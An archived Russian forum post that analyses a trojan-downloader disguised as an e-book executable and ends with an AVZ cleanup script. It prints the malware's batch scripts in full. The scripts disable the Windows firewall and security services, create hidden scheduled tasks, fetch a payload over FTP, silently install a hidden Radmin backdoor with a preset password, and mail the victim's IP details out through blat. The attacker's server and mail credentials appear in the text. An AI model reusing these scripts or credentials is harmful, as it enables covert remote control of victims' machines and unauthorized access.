1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.

Скрытый радмин + батник-лоадер. Анализ.

  1. Сегодня на форуме в личку прошло сообщение с просьбой проверить файл. Я согласился, любопытно же.
    kak_ponyat_muzhchin_bibl.ru.exe (md5:2138A224BDDD1A36329F398A37E10AB9)
    Хэш суммы я буду указывать только для вредоносных файлов.
    В общем по описанию – это какая-то книга, почему в exe – непонятно, глядим далее.
    Воспользуемся PEiD:​

    [​IMG]
    UPX 0.89.6 – 1.02 / 1.05 – 2.90 (Delphi) stub -> Markus & Laszlo [RAR SFX]
    Попробуем распаковать винраром, получим два файла:

    filip_olegovich.exe
    и setup.exe (md5:C888FCE716D600EE53D467F7DF2B2475)
    [​IMG]

    Оба упакованы в upx, после распаковки получим следующую картину:

    [​IMG]

    filip_olegovich.exe – собранный в exe pdf-файл, он нас более не интересует.
    setup.exe (md5:732FCAA243C007DAA9354AEAF3F6D572) – компиллятор PureBasic 4.x -> Neil Hodgson *, что свойственно для конвертора bat-файлов в исполняемые exe.

    Пока оба варианта подозрительного файла загружаются на вирустотал, поглядим ресурсы распакованного setup.exe:

    [​IMG]

    Да, это конвертированный батник, который создаст 2 файла и выполнит собственный бат код:
    Код:
     
    sc config schedule start= auto
    sc start schedule
    sc config wscsvc start= disabled
    sc config SharedAccess start= disabled
    sc stop wscsvc
    sc stop SharedAccess
    schtasks /create /tn «f» /sc minute /mo 1 /ru «NT AUTHORITY\SYSTEM» /tr %systemroot%/ff.bat
    attrib +h %systemroot%/tasks/*.* netsh advfirewall set currentprofile state off
    C:/isendsms_setup.exe
    
    Этот батник запустит службу планировщика задач, остановит службы «центр обеспечения безопасности и оповещения системы безопасности» и «брэндмауэр windows» Далее добавит задание в планировщик, которое будет запускать файл ff.bat каждую минуту, скроет файл задания и снова отключит фаерволл.
    Разработчик или параноик или диллетант, скорее – второе.

    Проще говоря, этот файл setup.exe – экземпляр трояна- загрузчика (trojan-downloader), просто несколько импровезированный. Далее рассмотрим два указанных выше файла: Этот текст будет скопирован в %systemroot%/system.bin
    Код:
     
    u11631
    javasc
    get f.bat
    del check.txt
    bye
    
    А такой код в %systemroot%/ff.bat
    Код:
     
    sc config wscsvc start= disabled
    sc config SharedAccess start= disabled
    sc stop wscsvc sc stop SharedAccess
    ftp -s:C:\WINDOWS/system.bin ftp.on.ufanet.ru f.bat
    
    %systemroot% – папка windows, в моем случае C:\windows

    О чем это может нам сказать?
    Прежде всего, файл system.bin – конфиг для фтп-клиента, который зайдет на сервер и скачает определенный файл. (Строки по очереди: логин от сервера, пароль, скачивание файла с сервера, удаление файла на сервере, завершение ftp-сессии)

    Что делает файл ff.bat? Во первых останавливает и убирает из автозагрузки две службы: wscsvc - центр обеспечения безопасности и оповещения системы безопасности
    SharedAccess - брэндмауэр windows Это не позволяет встроенному фаерволлу заблокировать дальнейшую сетевую активность, а так же блокирует оповещения о брешах в безопасности системы.

    Далее поднимает подключение к фтп серверу ftp.on.ufanet.ru с настойками из файла system.bin. После завершения сессии фтп – выполнит файл f.ftp, который скачает с указанного сервера.


    Наши файлы setup.exe, кстати, уже проанализировались на virustotal:
    Дальше нам нужно получить файлы, которые должны были скачаться с фтп, для этого возьмем логин и пароль и подключимся самостоятельно:
    f.bat
    system.exe (md5:1ADEF54E08294BC7548C91C8F6CF2032) – RAR SFX архив с таким вот комментарием:
    path=%SYSTEMROOT%/help/win32silent=1overwrite=1setup=install.batЭтот параметр разархивирует в тихом режиме содержимое архива в %SYSTEMROOT%/help/win32

    [​IMG]

    После распаковывания тем же самым раром получаем ни что иное, как сборку скрытого радмина второй версии:
    [​IMG]
    raddrv.dll и AdmDll.dll – драйвера Radmin 2
    svchost.exe – исполняемый файл Radmin 2
    Blat.* – файлы, пренадлежащие консольному почтовому клеинту blat
    А вот эти файлы рассмотрим поподробней: install.bat
    Код:
    @echo off
    sc config wscsvc start= disabled
    sc stop wscsvc
    sc config SharedAccess start= disabled
    sc stop SharedAccess
    sc config schedule start= auto
    sc start schedule
    svchost.exe /install /silence
    svchost.exe /pass:12345678125 /save /silence
    REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d «Service Host Controller» /f
    svchost.exe /stop
    svchost.exe /start
    blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u ufanetcom2 -pw javascriptsc
    schtasks /create /tn «security» /sc minute /mo 15 /ru «NT AUTHORITY\SYSTEM» /tr %SYSTEMROOT%/help/win32/microsoft.bat
    attrib +h %systemroot%/tasks/*.*
    exit
    Разберем комманды по порядку. Прежде всего очередное отключение брэндмауэра и оповещений безопасности, затем повторный запуск службы планировщика задач. Далее – самое вкусное, запуск серверной части Radmin с параметрами, включающими тихую установку, предустановленный пароль а так же запись в реестр параметров сокрытия значка в трее жертвы. Второй ключ задаст имя службы радмина – Service Host Controller
    Ну и окончание – запуск самой службы. Таким образом на скомпрометированной системе установлен Radmin с предустановленным паролем и все возможным сокрытием. Далее мы видим запись в реестр данных для отправки почты с помощью почтового клиента blat и добавление всего этого бат-файла в автозагрузку через планировщик заданий. microsoft.bat
    Код:
    sc config SharedAccess start= disabled
    sc stop SharedAccess
    ipconfig /all>%SYSTEMROOT%\Help\win32/ip.txt
    %SYSTEMROOT%/help/win32/blat.exe
    %systemroot%/help/win32/ip.txt -to [email protected]
    exit
    Второй батник уже в который раз отключает системный фаерволл, а так же выполняет команду ipconfig /all с сохранением вывода в текстовый файл, который в дальнейшем отправится с помощью blat по адресу [email protected], короче говоря – отправит ip-адрес для подключения злоумышленника к инфицированной машине.

    На этом, в общем-то, все, анализ закончен. Анализ совершенно статичен, запускать в виртуальной среде ничего не пришлось, все банально. Но тем не менее, зайдя на почту я видел большое количество писем с ip-адресами жертв. Ниже будет приведен скрипт AVZ для лечения системы.
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
    StopService('r_server');
    DeleteService('r_server', true );
    TerminateProcessByName('c:\windows\help\win32\svchost.exe');
    DeleteFile('C:\WINDOWS\ff.bat');
    DeleteFile('C:\WINDOWS\SYSTEM.DLL');
    DeleteFileMask('C:\WINDOWS\help\win32', '*.*', true);
    BC_ImportAll;
    ExecuteSysClean;
    ExecuteWizard('TSW',2,3,true);
    BC_Activate;RebootWindows(true);
    end.
     
    1 человеку нравится это.